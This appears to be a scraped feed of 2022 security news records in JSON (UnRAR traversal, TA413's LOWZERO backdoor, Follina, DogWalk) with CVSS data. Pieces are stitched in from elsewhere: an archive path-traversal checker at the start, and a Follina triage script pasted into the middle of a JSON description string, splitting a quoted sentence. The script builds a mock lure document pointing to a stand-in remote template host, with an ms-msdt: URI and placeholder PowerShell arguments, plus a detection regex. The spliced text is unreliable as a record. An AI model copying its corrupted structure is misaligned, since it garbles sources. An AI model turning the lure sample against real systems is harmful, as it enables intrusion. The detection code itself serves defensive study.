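    """Map '\\' to '/' the way Unix unpackers do, BEFORE validation."""
    return name.replace("\\", "/")


def is_safe_entry(name):
    """True only for a relative name with no '..' component and no drive prefix."""
    n = normalise(name)
    if not n or n.startswith("/"):
        return False
    parts = [p for p in n.split("/") if p not in ("", ".")]
    if not parts or ".." in parts or ":" in parts[0]:
        return False
    return True


def resolve_inside(dest_dir, name):
    """Return the path to write `name` at, or None if it would escape dest_dir.

    The parent directory is resolved with realpath at write time, so a symlink
    that already exists under dest_dir (e.g. planted by an earlier entry) is
    followed and the escape is caught.
    """
    if not is_safe_entry(name):
        return None
    dest_real = os.path.realpath(dest_dir)
    target = os.path.join(dest_real, *normalise(name).split("/"))
    parent_real = os.path.realpath(os.path.dirname(target))
    if parent_real != dest_real and not parent_real.startswith(dest_real + os.sep):
        return None
    return os.path.join(parent_real, os.path.basename(target))


def demo():
    """Run both checks over the constructed names and a planted symlink."""
    results = {name: is_safe_entry(name) for name in SAMPLE_ENTRIES}
    with tempfile.TemporaryDirectory() as dest, tempfile.TemporaryDirectory() as outside:
        # Simulate an archive whose first entry was a symlink pointing outside
        # the extraction root; a later entry then tries to write through it.
        os.symlink(outside, os.path.join(dest, "link"))
        results["link/payload"] = resolve_inside(dest, "link/payload") is not None
        results["docs/readme.txt (write)"] = resolve_inside(dest, "docs/readme.txt") is not None
    return results


if __name__ == "__main__":
    for entry, allowed in demo().items():
        print("allow " if allowed else "REJECT", repr(entry))
```

The name check alone would pass "link/payload", which is why the write-time realpath check is not optional: an archive can legitimately contain symlinks, and the only reliable moment to decide whether a write stays inside the destination is after everything written so far is on disk.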
The vulnerability was [revealed](<https://thehackernews.com/2022/06/new-unrar-vulnerability-could-let.html>) by SonarSource researcher Simon Scannell in late June.\n\n\"RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation,\" the agency [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) in an advisory.\n\nNot much is known about the nature of the attacks, but the disclosure is evidence of a growing trend wherein threat actors are quick to scan for vulnerable systems after flaws are publicly disclosed and take the opportunity to launch malware and ransomware campaigns.\n\nOn top of that, CISA has also added [CVE-2022-34713](<https://thehackernews.com/2022/08/microsoft-issues-patches-for-121-flaws.html>) to the catalog after Microsoft, as part of its Patch Tuesday updates on August 9, revealed that it has seen indications that the vulnerability has been exploited in the wild.\n\nSaid to be a variant of the vulnerability publicly known as [DogWalk](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>), the shortcoming in the Microsoft Windows Support Diagnostic Tool (MSDT) component could be leveraged by a rogue actor to execute arbitrary code on susceptible systems by tricking a victim into opening a decoy file.\n\nFederal agencies in the U.S. are mandated to apply the updates for both flaws by August 30 to reduce their exposure to cyberattacks.\n
", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-08-10T06:59:00", "type": "thn", "title": "CISA Issues Warning on Active Exploitation of UnRAR Software for Linux Systems", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333", "CVE-2022-34713"], "modified": "2022-08-11T03:56:12", "id": "THN:A48A11A9708B43B68518F6625F1C0CB8", "href": "https://thehackernews.com/2022/08/cisa-issues-warning-on-active.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2022-09-26T14:15:34", "description": "A China-aligned advanced persistent threat actor known as TA413 weaponized 
recently disclosed flaws in Sophos Firewall and Microsoft Office to deploy a never-before-seen backdoor called **LOWZERO** as part of an espionage campaign aimed at Tibetan entities.\n\nTargets primarily consisted of organizations associated with the Tibetan community, including enterprises associated with the Tibetan government-in-exile.\n\nThe intrusions involved the exploitation of [CVE-2022-1040](<https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html>) and [CVE-2022-30190](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) (aka \"Follina\"), two remote code execution vulnerabilities in Sophos Firewall and Microsoft Office, respectively.\n\n\"This willingness to rapidly incorporate new techniques and methods of initial access contrasts with the group's continued use of well known and reported capabilities, such as the Royal Road RTF weaponizer, and often lax infrastructure procurement tendencies,\" Recorded Future [said](<https://www.recordedfuture.com/chinese-state-sponsored-group-ta413-adopts-new-capabilities-in-pursuit-of-tibetan-targets>) in a new technical analysis.\n\nTA413, also known as LuckyCat, has been linked to relentlessly targeting organizations and individuals associated with the Tibetan community at least since 2020 using malware such as ExileRAT, Sepulcher, and a malicious Mozilla Firefox browser extension dubbed [FriarFox](<https://thehackernews.com/2021/02/chinese-hackers-using-firefox-extension.html>).\n\nThe group's exploitation of the Follina flaw was previously [highlighted](<https://thehackernews.com/2022/05/chinese-hackers-begin-exploiting-latest.html>) by Proofpoint in June 2022, although the ultimate end goal of the 
infection chains remained unclear.\n\nAlso put to use in a spear-phishing attack identified in May 2022 was a malicious RTF document that exploited flaws in Microsoft Equation Editor to drop the custom LOWZERO implant. This was achieved by employing a [Royal Road RTF weaponizer tool](<https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html>), which is widely shared among Chinese threat actors.\n\nIn another phishing email sent to a Tibetan target in late May, a Microsoft Word attachment hosted on the Google Firebase service attempted to leverage the Follina vulnerability to execute a PowerShell command designed to download the backdoor from a remote server.\n\nLOWZERO, the backdoor, is capable of receiving additional modules from its command-and-control (C2) server, but only on the condition that the compromised machine is deemed to be of interest to the threat actor.\n\n\"The group continues to incorporate new capabilities while also relying on tried-and-tested tactics, techniques, and procedures,\" the cybersecurity firm said.\n\n\"TA413's adoption of both zero-day and recently published vulnerabilities is indicative of [wider](<https://www.technologyreview.com/2022/02/28/1046575/how-china-built-a-one-of-a-kind-cyber-espionage-behemoth-to-last/>) [trends](<https://www.crowdstrike.com/global-threat-report/>) with Chinese cyber-espionage groups whereby exploits regularly appear in use by multiple distinct Chinese activity groups prior to their widespread public availability.\"\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-26T12:14:00", "type": "thn", "title": "Chinese Espionage Hackers Target Tibetans Using New LOWZERO Backdoor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-30190"], "modified": "2022-09-26T13:59:50", "id": "THN:44DD118DC206D25EB4ECAE95173FE16E", "href": "https://thehackernews.com/2022/09/chinese-espionage-hackers-target.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T03:57:00", "description": "Microsoft finally released fixes to address an actively exploited 
Windows zero-day vulnerability known as Follina as part of its Patch Tuesday updates.\n\nAlso addressed by the tech giant are [55 other flaws](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Jun>), three of which are rated Critical, 51 are rated Important, and one is rated Moderate in severity. Separately, [five more shortcomings](<https://docs.microsoft.com/en-us/deployedge/microsoft-edge-relnotes-security>) were resolved in the Microsoft Edge browser.\n\nTracked as [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) (CVSS score: 7.8), the [zero-day bug](<https://thehackernews.com/2022/05/watch-out-researchers-spot-new.html>) relates to a remote code execution vulnerability affecting the Windows Support Diagnostic Tool (MSDT) when it's invoked using the \"ms-msdt:\" URI protocol scheme from an application such as Word.\n\nThe vulnerability can be trivially exploited by means of a specially crafted Word document that downloads and loads a malicious HTML file through Word's remote template feature. The HTML file ultimately permits the attacker to load and execute PowerShell code within Windows.\n\n\"An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application,\" Microsoft said in an advisory. 
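The chain just described (a Word document that pulls an HTML file from a remote server, which in turn invokes the ms-msdt: handler to run PowerShell) leaves two static artefacts a defender can look for without ever opening the document in Word: an external relationship inside the .docx package whose target is an http(s) URL, and an ms-msdt: URI in the HTML that target serves. The following is an added example in Python, not code from the article or from Microsoft. The .docx package, the lure URL (template.example.invalid) and the HTML are constructed inside the script, and the "fetch" step is a dictionary lookup rather than a network request, so it runs offline; the MSDT arguments in the sample HTML are illustrative placeholders, not a working payload.

```python
"""Static triage of a Word document for the Follina (CVE-2022-30190) chain.

Added example, not code from the article, Microsoft or any vendor. The .docx,
the lure URL and the HTML below are constructed so the script runs offline.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
REL_PREFIX = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/"
# Relationship types that have no business pointing at a web server in a
# document that should be self-contained. Ordinary external hyperlinks are
# normal in documents and are deliberately not flagged.
RISKY_REL_TYPES = {"oleObject", "attachedTemplate", "frame"}
# The protocol handler Follina abuses; capture the rest of the line so the
# MSDT arguments land in the report.
MSDT_URI = re.compile(r"ms-msdt:[^\r\n<]{0,120}", re.IGNORECASE)


def external_targets(docx_bytes):
    """List (rels_part, relationship_type, target) for risky external relationships.

    Every .rels part is scanned: a remote template is declared in
    word/_rels/settings.xml.rels, a linked OLE object in word/_rels/document.xml.rels.
    """
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for part in pkg.namelist():
            if not part.endswith(".rels"):
                continue
            root = ET.fromstring(pkg.read(part))
            for rel in root.iter(REL_NS + "Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                if rel_type in RISKY_REL_TYPES and target.lower().startswith(("http://", "https://")):
                    hits.append((part, rel_type, target))
    return hits


def msdt_uris(html):
    """Return every ms-msdt: URI found in the fetched template HTML."""
    return MSDT_URI.findall(html)


def triage(docx_bytes, fetch):
    """Combine both checks. `fetch(url)` returns the HTML for a URL or None;
    the caller decides how it is retrieved (here: a dict lookup, no network)."""
    report = {"external": external_targets(docx_bytes), "msdt": []}
    for _, _, target in report["external"]:
        html = fetch(target)
        if html:
            report["msdt"].extend(msdt_uris(html))
    if report["msdt"]:
        report["verdict"] = "follina-chain"
    elif report["external"]:
        report["verdict"] = "remote-template"
    else:
        report["verdict"] = "clean"
    return report


def build_docx(rels_xml):
    """Construct a minimal .docx package; only the parts the scanner reads are filled in."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        pkg.writestr("word/document.xml",
                     '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"><w:body/></w:document>')
        pkg.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


RELS_HEAD = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
             '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">')
RELS_TAIL = "</Relationships>"
LURE_URL = "http://template.example.invalid/lure.html"  # constructed, never fetched

# Constructed lure: a linked OLE object whose target is a web page.
MALICIOUS_RELS = (RELS_HEAD
                  + f'<Relationship Id="rId1" Type="{REL_PREFIX}styles" Target="styles.xml"/>'
                  + f'<Relationship Id="rId2" Type="{REL_PREFIX}oleObject" Target="{LURE_URL}" TargetMode="External"/>'
                  + RELS_TAIL)
# Constructed benign document: an ordinary external hyperlink only.
BENIGN_RELS = (RELS_HEAD
               + f'<Relationship Id="rId1" Type="{REL_PREFIX}styles" Target="styles.xml"/>'
               + f'<Relationship Id="rId2" Type="{REL_PREFIX}hyperlink" Target="https://www.example.com/" TargetMode="External"/>'
               + RELS_TAIL)
# Constructed stand-in for the HTML the lure points at; the MSDT arguments are
# illustrative placeholders, not a working payload.
LURE_HTML = """<!doctype html><html><body><script>
window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_BrowseForFile=$(Invoke-Expression($cmd))\\"";
</script></body></html>"""
FETCHED = {LURE_URL: LURE_HTML}  # offline substitute for an HTTP fetch


def demo():
    """Triage the constructed malicious and benign packages."""
    return (triage(build_docx(MALICIOUS_RELS), FETCHED.get),
            triage(build_docx(BENIGN_RELS), FETCHED.get))


if __name__ == "__main__":
    for report in demo():
        print(report["verdict"], report)
```

Running the script prints "follina-chain" for the constructed lure and "clean" for the benign package. Pointed at a quarantined attachment, the first check alone (an oleObject or attachedTemplate relationship with an http(s) target) is already a strong triage signal, because the delivery does not rely on macros and so leaves none of the usual VBA indicators; the fetch step should only ever be done from a sandboxed egress path, since the template server may fingerprint or serve different content to analysts.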
\"The attacker can then install programs, view, change, or delete data, or create new accounts in the context allowed by the user's rights.\"\n\nA crucial aspect of Follina is that exploiting the flaw does not require the use of macros, thereby obviating the need for an adversary to trick victims into enabling macros to trigger the attack.\n\nSince details of the issue surfaced late last month, it has been [subjected](<https://thehackernews.com/2022/06/state-backed-hackers-exploit-microsoft.html>) to [widespread](<https://thehackernews.com/2022/06/researchers-warn-of-unpatched-dogwalk.html>) [exploitation](<https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware>) by different threat actors to drop a variety of payloads such as AsyncRAT, QBot, and other information stealers. Evidence indicates that Follina has been abused in the wild since at least April 12, 2022.\n\nBesides CVE-2022-30190, the cumulative security update also resolves several remote code execution flaws in Windows Network File System ([CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>)), Windows Hyper-V ([CVE-2022-30163](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30163>)), Windows Lightweight Directory Access Protocol, Microsoft Office, HEVC Video Extensions, and Azure RTOS GUIX Studio.\n\nAnother security shortcoming of note is [CVE-2022-30147](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30147>) (CVSS score: 7.8), an elevation of privilege vulnerability affecting Windows Installer and which has been marked with an \"Exploitation More Likely\" assessment by Microsoft.\n\n\"Once an attacker has gained initial access, they can elevate that initial level of access up to that of an administrator, where they can disable security tools,\" Kev Breen, director of cyber threat research at Immersive Labs, said in a statement. 
\"In the case of ransomware attack, this leverages access to more sensitive data before encrypting the files.\"\n\nThe latest round of patches is also notable for not featuring any updates to the Print Spooler component for the first time since January 2022. They also arrive as Microsoft said it's officially [retiring support](<https://docs.microsoft.com/en-us/lifecycle/products/internet-explorer-11>) for [Internet Explorer 11](<https://docs.microsoft.com/en-us/lifecycle/announcements/internet-explorer-11-end-of-support-windows-10>) starting June 15, 2022, on Windows 10 Semi-Annual Channels and Windows 10 IoT Semi-Annual Channels.\n\n### Software Patches from Other Vendors\n\nIn addition to Microsoft, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [Adobe](<https://helpx.adobe.com/security/security-bulletin.html>)\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/security/bulletin/2022-06-01>)\n * [Apache Projects](<https://blogs.apache.org/foundation/entry/the-apache-news-round-up260>)\n * [Atlassian Confluence Server and Data Center](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * [Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [GitLab](<https://thehackernews.com/2022/06/gitlab-issues-security-patch-for.html>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/06/stable-channel-update-for-desktop.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * 
[Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/June-2022>)\n * [Mozilla Firefox, Firefox ESR, and Thunderbird](<https://www.mozilla.org/en-US/security/advisories/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/june-2022-bulletin.html>)\n * [Samba](<https://www.samba.org/samba/history/>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * [Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>), and\n * [VMware](<https://www.vmware.com/security/advisories.html>)\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T03:42:00", "type": "thn", "title": "Patch Tuesday: Microsoft Issues Fix for Actively Exploited 'Follina' Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30136", "CVE-2022-30147", "CVE-2022-30163", "CVE-2022-30190"], "modified": "2022-06-16T03:10:20", "id": "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "href": "https://thehackernews.com/2022/06/patch-tuesday-microsoft-issues-fix-for.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2022-08-10T12:48:23", "description": "Microsoft is urging users to patch a zero-day vulnerability dubbed Dogwalk that is actively being exploited in the wild. 
The bug ([CVE-2022-34713](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-34713>)) is tied to the Microsoft Windows Support Diagnostic Tool (MSDT) and allows an attacker to execute code on a vulnerable system.\n\n\u201cThe volume of fixes released this month is markedly higher than what is normally expected in an August release. It\u2019s almost triple the size of last year\u2019s August release, and it\u2019s the second largest release this year,\u201d wrote Dustin Childs, Zero Day Initiative manager, in a [Tuesday blog post](<https://www.zerodayinitiative.com/blog/2022/8/9/the-august-2022-security-update-review>).\n\n## **Dogwalk Flaw Was Over Two Years Old**\n\nThe actively exploited Dogwalk bug was first reported to Microsoft in January 2020 by researcher Imre Rad. However, it wasn\u2019t until a [separate researcher began tracking the exploitation](<https://twitter.com/j00sean/status/1531643635543990275>) of a flaw dubbed [Follina](<https://threatpost.com/follina-exploited-by-state-sponsored-hackers/179890/>) ([CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>)) that the Dogwalk bug was rediscovered. That renewed interest in Dogwalk appears to have motivated Microsoft to add the patch to this month\u2019s round of fixes, according to a Tenable [Patch Tuesday roundup report](<https://www.tenable.com/blog/microsofts-august-2022-patch-tuesday-addresses-118-cves-cve-2022-34713>).\n\nMicrosoft states that CVE-2022-34713 is a \u201cvariant of\u201d Dogwalk, but different. Microsoft rated the vulnerability Important and gave it a Local attack vector, meaning the malicious content has to be opened on the vulnerable computer rather than reached over the network. 
However, researchers at Zero Day Initiative outline how the attack can still be delivered remotely.\n\n\u201cThere is an element of social engineering to this as a threat actor would need to convince a user to click a link or open a document,\u201d Childs wrote.\n\nMicrosoft rates the attack complexity as low and the privileges required as none, meaning the bug can be exploited reliably and the attacker needs no existing foothold on the system.\n\n\u201cThis bug also allows code execution when MSDT is called using the URL protocol from a calling application, typically Microsoft Word,\u201d Childs wrote. \u201cIt\u2019s not clear if this vulnerability is the result of a failed patch or something new,\u201d he added.\n\n## **17 Critical Flaws**\n\nThe most serious of the vulnerabilities patched on Tuesday include a trio of elevation of privilege vulnerabilities opening instances of Microsoft Exchange Server to attack. Microsoft has released a [separate alert page](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-august-2022-exchange-server-security-updates/ba-p/3593862>) with mitigation guidance for these flaws.\n\n\u201cAll three vulnerabilities require authentication and user interaction to exploit \u2014 an attacker would need to entice a target to visit a specially crafted Exchange server, likely through phishing,\u201d wrote Tenable regarding the Exchange Server bugs.\n\nBack in the Patch Tuesday spotlight is a critical flaw ([CVE-2022-35804](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-35804>)) in Microsoft\u2019s Server Message Block (SMB) client and server running on Windows 11 systems using Microsoft SMB 3.1.1 (SMBv3), according to the company. 
Microsoft categorized the bug as \u201cExploitation More Likely\u201d and assigned it a CVSS score of 8.8.\n\nThe flaw only affects Windows 11, which Zero Day Initiative said, \u201cimplies some new functionality introduced this vulnerability.\u201d Researchers there said the SMB flaw could potentially be wormable between affected Windows 11 systems, but only when the SMB server is enabled.\n\n\u201cDisabling SMBv3 compression is a workaround for this bug, but applying the update is the best method to remediate the vulnerability,\u201d wrote Childs.\n\nMicrosoft also patched a remote code execution flaw ([CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>)) in its Windows Network File System, rated between 8.5 and 9.8 in severity. This is the fourth month in a row that Microsoft has deployed a critical NFS code execution patch. Interestingly, Microsoft describes the flaw as Important, while researchers warn the bug is Critical and should be a priority patch.\n\n\u201cTo exploit this, a remote, unauthenticated attacker would need to make a specially crafted call to an affected NFS server. This would provide the threat actor with code execution at elevated privileges. Microsoft lists this as Important severity, but if you\u2019re using NFS, I would treat it as Critical. 
Definitely test and deploy this fix quickly,\u201d advises Zero Day Initiative.\n\nIn related news, [Adobe patched 25 CVEs on Tuesday](<https://helpx.adobe.com/security.html>) tackling bugs in Adobe Acrobat and Reader, Commerce, Illustrator, FrameMaker and Adobe Premier Elements.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-10T12:48:05", "type": "threatpost", "title": "Microsoft Patches \u2018Dogwalk\u2019 Zero-Day and 17 Critical Flaws", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190", "CVE-2022-34713", "CVE-2022-34715", "CVE-2022-35804"], "modified": "2022-08-10T12:48:05", "id": "THREATPOST:24243FD4F7B9BDBDAC283E15D460128F", "href": "https://threatpost.com/microsoft-patches-dogwalk-zero-day-and-17-critical-flaws/180378/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-07T12:48:32", "description": "Researchers have added state-sponsored hackers to the list of adversaries attempting to exploit Microsoft\u2019s now-patched Follina vulnerability. 
According to researchers at Proofpoint, state-sponsored hackers have attempted to abuse the Follina vulnerability in Microsoft Office, aiming an email-based exploit at U.S. and E.U. government targets via phishing campaigns.\n\nProofpoint researchers spotted the attacks and believe the adversaries have ties to a government, which they did not identify. The campaigns target U.S. and E.U. government workers. Malicious emails contain fake recruitment pitches promising a 20 percent boost in salaries and entice recipients to download an accompanying attachment.\n\nIn a Twitter-based statement, Sherrod DeGrippo, vice president of threat research at Proofpoint, said about 10 Proofpoint customers had received over 1,000 such messages.\n\nThe malicious attachment targets the remote code execution bug [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>), dubbed Follina.\n\n[Discovered](<https://twitter.com/nao_sec/status/1530196847679401984>) last month, the flaw lies in the Microsoft Windows Support Diagnostic Tool (MSDT). As Microsoft explained in a [blog post](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>), the bug \u201cexists when MSDT is called using the URL protocol from a calling application such as Word. 
An attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nState-sponsored abuse of the flaw is just the latest in a string of Follina-related attacks.\n\nIf successfully exploited, attackers can use the Follina flaw to install programs, view, change or delete data, or create new accounts in the context allowed by the user\u2019s rights, the company said.\n\n\u201cA remote code execution vulnerability exists when MSDT is called using the URL protocol from a calling application such as Word,\u201d Microsoft explained in [its guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on the Microsoft Security Response Center. \u201cAn attacker who successfully exploits this vulnerability can run arbitrary code with the privileges of the calling application.\u201d\n\nMicrosoft\u2019s workaround comes some six weeks after the vulnerability was apparently first identified. 
Researchers from [Shadow Chaser Group](<https://twitter.com/ShadowChasing1?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) noticed it on April 12 and patched by Microsoft in May.\n\nProofpoint says the malicious file used in the recruitment phishing campaigns, if downloaded, executes a script that can ultimately check for virtualized environment to abuse and \u201csteals information from local browsers, mail clients and file services, conducts machine recon and then zips it for exfil.\u201d\n\nProofpoint explained in a tweet, \u201cThe extensive reconnaissance conducted by [a] second Powershell script demonstrated an actor interested in a large variety of software on a target\u2019s computer.\u201d It is that behavior that raised concerns that the campaign had ties to a \u201cstate aligned nexus,\u201d researchers noted.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-07T12:45:00", "type": "threatpost", "title": "Follina Exploited by State-Sponsored Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-07T12:45:00", "id": 
